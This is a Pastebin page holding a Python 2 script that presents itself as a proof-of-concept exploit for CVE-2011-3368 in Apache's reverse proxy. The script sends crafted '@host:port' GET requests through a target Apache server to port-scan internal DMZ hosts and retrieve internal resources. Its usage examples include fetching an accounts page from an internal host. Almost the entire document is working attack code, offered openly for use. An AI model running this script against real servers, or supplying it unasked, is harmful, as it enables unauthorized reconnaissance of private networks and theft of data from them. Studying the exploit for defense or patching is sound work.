API tools faq
paste
Advertisement
parkdream1

apache.py

parkdream1
Apr 27th, 2012
246
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.37 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. import socket
  4. import string
  5. import getopt, sys
  6.  
  7.  
  8. known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
  9.  
  10. def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
  11.  
  12.     get = "GET " + url + "@" + internal_target + ":" + internal_port +  "/" + resource + " HTTP/1.1\r\n"
  13.     get = get + "Host: " + apache_target + "\r\n\r\n"
  14.      
  15.     remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  16.     remoteserver.settimeout(3)
  17.  
  18.     try:
  19.         remoteserver.connect((apache_target, int(apache_port)))
  20.         remoteserver.send(get)
  21.         return remoteserver.recv(4096)
  22.     except:
  23.         return ""
  24.  
  25. def get_banner(result):
  26.     return result[string.find(result, "\r\n\r\n")+4:]
  27.  
  28.  
  29. def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
  30.  
  31.     print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
  32.     for port in tested_ports:
  33.         port = str(port)
  34.         result = send_request(url, apache_target, apache_port, internal_target, port, resource)
  35.         if string.find(result,"HTTP/1.1 200")!=-1 or \
  36.         string.find(result,"HTTP/1.1 30")!=-1 or \
  37.         string.find(result,"HTTP/1.1 502")!=-1:
  38.             print "- Open port: " + port + "/TCP"
  39.             print get_banner(result)
  40.         elif len(result)==0:
  41.             print "- Filtered port: " + port + "/TCP"
  42.         else:
  43.             print "- Closed port: " + port + "/TCP"
  44.              
  45.  
  46. def usage():
  47.     print
  48.     print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
  49.     print "http://www.secforce.co.uk"
  50.     print
  51.     print "usage():"
  52.     print "python apache_scan.py [options]"
  53.     print
  54.     print " [options]"
  55.     print "     -r: Remote Apache host"
  56.     print "     -p: Remote Apache port (default is 80)"
  57.     print "     -u: URL on the remote web server (default is /)"
  58.     print "     -d: Host in the DMZ (default is 127.0.0.1)"
  59.     print "     -e: Port in the DMZ (enables 'single port scan')"
  60.     print "     -g: GET request to the host in the DMZ (default is /)"
  61.     print "     -h: Help page"
  62.     print
  63.     print "examples:"
  64.     print " - Port scan of the remote host"
  65.     print "     python apache_scan.py -r www.example.com -u /images/test.gif"
  66.     print " - Port scan of a host in the DMZ"
  67.     print "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
  68.     print " - Retrieve a resource from a host in the DMZ"
  69.     print "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
  70.     print
  71.  
  72. def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
  73.     print
  74.     print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
  75.     print "http://www.secforce.co.uk"
  76.     print
  77.     print " [+] Target: " + apache_target
  78.     print " [+] Target port: " + apache_port
  79.     print " [+] Internal host: " + internal_target
  80.     print " [+] Tested ports: " + str(tested_ports)
  81.     print " [+] Internal resource: " + resource
  82.     print
  83.  
  84.  
  85. def main():
  86.  
  87.     global apache_target
  88.     global apache_port
  89.     global url
  90.     global internal_target
  91.     global internal_port
  92.     global resource
  93.  
  94.     try:
  95.         opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
  96.     except getopt.GetoptError:
  97.         usage()
  98.         sys.exit(2)
  99.  
  100.     try:
  101.         for o, a in opts:
  102.             if o in ("-h", "--help"):
  103.                 usage()
  104.                 sys.exit(2)
  105.             if o == "-u":
  106.                 url=a
  107.             if o == "-r":
  108.                 apache_target=a
  109.             if o == "-p":
  110.                 apache_port=a
  111.             if o == "-d":
  112.                 internal_target = a
  113.             if o == "-e":
  114.                 internal_port=a
  115.             if o == "-g":
  116.                 resource=a            
  117.          
  118.     except getopt.GetoptError:
  119.         usage()
  120.         sys.exit(2)
  121.          
  122.     if apache_target == "":
  123.         usage()
  124.         sys.exit(2)
  125.  
  126.  
  127. url = "/"
  128. apache_target = ""
  129. apache_port = "80"
  130. internal_target = "127.0.0.1"
  131. internal_port = ""
  132. resource = "/"
  133.  
  134. main()
  135.  
  136. if internal_port!="":
  137.     tested_ports = [internal_port]
  138. else:
  139.     tested_ports = known_ports
  140.  
  141. scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!